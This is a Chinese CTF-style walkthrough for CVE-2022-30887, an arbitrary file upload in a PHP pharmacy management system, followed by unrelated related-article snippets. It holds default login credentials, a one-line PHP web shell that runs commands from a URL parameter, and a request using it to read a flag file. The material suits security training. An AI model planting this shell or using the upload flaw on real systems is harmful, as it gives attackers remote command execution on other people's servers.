CVE-2022-30887

news2024/11/26 21:51:19

文章目录

    • CVE-2022-30887
        • 一、漏洞介绍
        • 二、渗透步骤
          • 1、打开网站
          • 2、登录网站
          • 3、shell
          • 4、文件上传
          • 5、查看flag

CVE-2022-30887

一、漏洞介绍

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

二、渗透步骤

1、打开网站

URL:http://eci-2zeh9ogurma94pas3owb.cloudeci1.ichunqiu.com/login.php

在这里插入图片描述

2、登录网站
# 邮箱:mayuri.infospace@gmail.com
# 密码:mayurik

在这里插入图片描述

3、shell
<?php 
	system($_GET[1]);
?>
4、文件上传

在这里插入图片描述

5、查看flag

URL:http://eci-2zeh9ogurma94pas3owb.cloudeci1.ichunqiu.com/assets/myimages/ant.php?1=cat%20/flag

?1=cat /flag

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/615835.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MLC Chat App上架苹果App Store可在本地运行语言模型;谷歌推出AI设计工具StyleDrop

&#x1f989; AI新闻 &#x1f680; 开源项目MLC Chat App上架苹果App Store&#xff0c;可在本地运行语言模型 摘要&#xff1a;CMU助理陈天其教授表示&#xff0c;开源项目MLC LLM的独立聊天应用程序MLC Chat App已上架苹果App Store&#xff0c;允许将任何语言模型本地部…

3.用图神经网络进行图分类

在本教程中&#xff0c;我们将更深入地了解如何将图神经网络&#xff08;GNN&#xff09;应用于图分类任务。图分类是指在给定图的数据集的情况下&#xff0c;基于一些结构图的属性对整个图&#xff08;与节点相反&#xff09;进行分类的问题。在这里&#xff0c;我们希望嵌入整…

uniapp:HbuildeX项目实现jenkins自动化打包上传

前序: 基于HBuilderX创建的项目。 配置uniapp 指令式打包APP、微信小程序、H5。 ubuntu系统上的jenkins部署基础指令,发送给windows服务器上,windows服务器使用HBuilderX软件的cli.exe执行相关cli命令打包,然后jenkins再调用接口下载打包后的文件。 可实现多线程同时打…

社会主义核心价值观解码

今天随机刷题时&#xff0c;遇到了一个蛮有意思的题&#xff0c;浅浅记录一下&#xff0c;挺好玩的。 题目&#xff1a; [鹤城杯 2021]easy_crypto 难度&#xff1a;很小啦&#xff0c;差不多签到题 文件下载的内容如下&#xff1a; 最开始我以为是把每个词按社会主义那个顺序…

Java基础学习+面向对象

一&#xff0c;基础概念介绍 1.1Java跨平台原理&#xff08;一次编译&#xff0c;处处运行&#xff09; Java 源代码经过编译&#xff0c;生成字节码文件&#xff0c;交由 Java 虚拟机来执行&#xff0c;不同得系统有不同得JVM,借助JVM 实现跨平台。就比如说我们在 Windows 下…

Redis内存优化——内存淘汰及回收机制

文章目录 Redis内存优化——内存淘汰及回收机制内存淘汰策略LRU和LFULRU和Redis的近似LRU什么是LRURedis的近似LRU LFU如何选择 内存回收策略惰性删除定期删除 配置文件说明总结 系列文章目录 本文是系列文章&#xff0c;为了增强您的阅读体验&#xff0c;已将系列文章目录放入…

Yakit: 集成化单兵安全能力平台使用教程·MITM交互式劫持篇

Yakit: 集成化单兵安全能力平台使用教程MITM交互式劫持篇 1.免配置抓包2.拦截HTTPS的消息3.代理和浏览器设置4.内容规则:标记/替换流量5.过滤流量6.网站树视角1.免配置抓包 点击手工测试--MITM交互式劫持即可进入MITM劫持页面,点击免配置启动进入免配置启动设置界面(这类似…

ESP32-C2-12模组 使用乐鑫AT固件示例

ESP32C2 AT固件使用 ESP32 C2模组&#xff0c;如图1-1所示 图1-1 ESP32 C2模组 ESP32 C2开发板&#xff0c;如图1-2所示 图1-2 ESP32 C2开发 方案亮点 1、完整的 WiFi 子系统&#xff0c;符合 IEEE 802.11b/g/n 协议&#xff0c;具有 Station 模式、SoftAP 模式、SoftAP Stat…

vue3+uniapp开发小程序踩坑指南(持续更新)

小程序常见问题汇总&#xff1a; 1、TypeError: Cannot read property forceUpdate of undefined 原因&#xff1a;没有配置小程序AppID 2、define is not defined 报错一堆文件找不到&#xff0c;并且有define is not defined错误提示 原因&#xff1a;没有配置基础库或者基…

Linux安装Nginx并部署前端项目【内/外网-保姆级教程】

目录 1下载所需要的安装包 2安装步骤 2.1将下载的完整文件夹通过压缩包的形式&#xff0c;上传到你的路径下解压. 2.2 进入到gcc文件夹下&#xff0c;执行命令&#xff1a; 2.3进入到gcc-c文件夹下&#xff0c;执行命令&#xff1a; 2.4检查gcc、gcc-c是否安装成功 2.5执…

【深度学习】日常笔记

一开始感觉学习方向有点飘忽不定&#xff0c;后面查找资料和思考&#xff0c;发现其实图神经网络、异构图、推荐系统这三者的概念其实是相通&#xff0c;紧密联系的。推荐系统是指根据用户历史行为和偏好&#xff0c;为用户提供个性化的商品或服务推荐。而在推荐系统中&#xf…

公司新来个以前拿 20K 出来的,让我见识到了什么叫真正的测试天花板....

今天上班开早会就是新人见面仪式&#xff0c;听说来了个很厉害的大佬&#xff0c;年纪还不大&#xff0c;是上家公司离职过来的&#xff0c;薪资已经达到中高等水平&#xff0c;很多人都好奇不已&#xff0c;能拿到这个薪资应该人不简单&#xff0c;果然&#xff0c;自我介绍的…

HCIE-Cloud Computing LAB备考第二步:实战解题–第五题:论述一--双活容灾设计--记忆宫殿

文章目录 题目解法记忆宫殿存储链路要求存储业务网络链路存储复制网络链路仲裁网络链路 VRM要求主机要求存储要求 对比法存储业务网络链路和存储复制网络链路VRM和主机要求 提炼法 题目 完成FC双活设计&#xff0c;交由工程师搭建。为达到预期效果请把以下要求罗列出来&#x…

一文带你进入自动化测试

8年前我刚进入到IT行业&#xff0c;现在发现学习软件测试的人越来越多&#xff0c;今天我想根据自己的行业经验给大家提一些建议。 最近聊到软件测试的行业内卷&#xff0c;越来越多的转行和大学生进入测试行业。想要获得更好的待遇和机会&#xff0c;不断提升自己的技能栈成了…

001网络模型与socket的介绍

我们平常使用的程序&#xff08;或者说软件&#xff09;一般都是通过应用层来访问网络的&#xff0c;程序产生的数据会一层一层地往下传输&#xff0c;直到最后的网络接口层&#xff0c;就通过网线发送到互联网上去了。数据每往下走一层&#xff0c;就会被这一层的协议增加一层…

chatgpt赋能python:Python如何写配置文件-一种简单的方法

Python 如何写配置文件 - 一种简单的方法 在Python编程中&#xff0c;配置文件是必不可少的&#xff0c;因为它们允许我们在代码中保持所有可配置属性&#xff0c;而不是在代码中写死它们。这样&#xff0c;我们可以很容易地更改我们的应用程序的行为&#xff0c;而不必更改代…

MySQL从入门到快速上手

文章目录 第一章 了解SQL第二章 检索数据第三章 排序第四章 过滤数据第五章 高级数据过滤第六章 多表查询内连接&#xff08;交集&#xff09;外连接多表连接UNIONUNION ALL 第七章 单行函数日期和时间函数获取日期、时间日期与时间戳的转换获取月份、星期、星期数、天数等函数…

Banana Pi BPI-Wifi6路由器采用创耀科技TR6560/TR5220 wifi芯片方案设计,支持PoE网络供电

香蕉派BPI-Wifi6路由器设计采用了创耀科技TR6560 TR5220 wifi无线芯片设计&#xff0c;是一款标准的wifi6路由器解决方案。内置高性能双核ARM Cortec A9处理器&#xff0c;用于WIFI消息转发或智能业务处理&#xff0c;内置高性能LSW和硬件NAT&#xff0c;最大支持5Gbps的报文转…

Python 写Android App性能:入门到高级

引言 Android性能测试是移动应用开发的关键部分。无论是响应时间&#xff0c;内存使用&#xff0c;CPU占用&#xff0c;还是电池消耗&#xff0c;性能的每个方面都直接影响到用户体验。在这篇文章中&#xff0c;我们将介绍如何使用Python进行Android性能测试&#xff0c;从入门…

怎么样正确的看待档案室的八防环境监控系统

历史文化遗产是无价之宝&#xff0c;而如何保护它们却是一项永恒的任务。近日&#xff0c;盛世宏博推出了八防环境监控系统&#xff0c;让人惊叹不已&#xff01;这个系统不仅能够实时监测温度、湿度、光照等多项指标&#xff0c;还能进行预警和自动调节&#xff0c;保障资料的…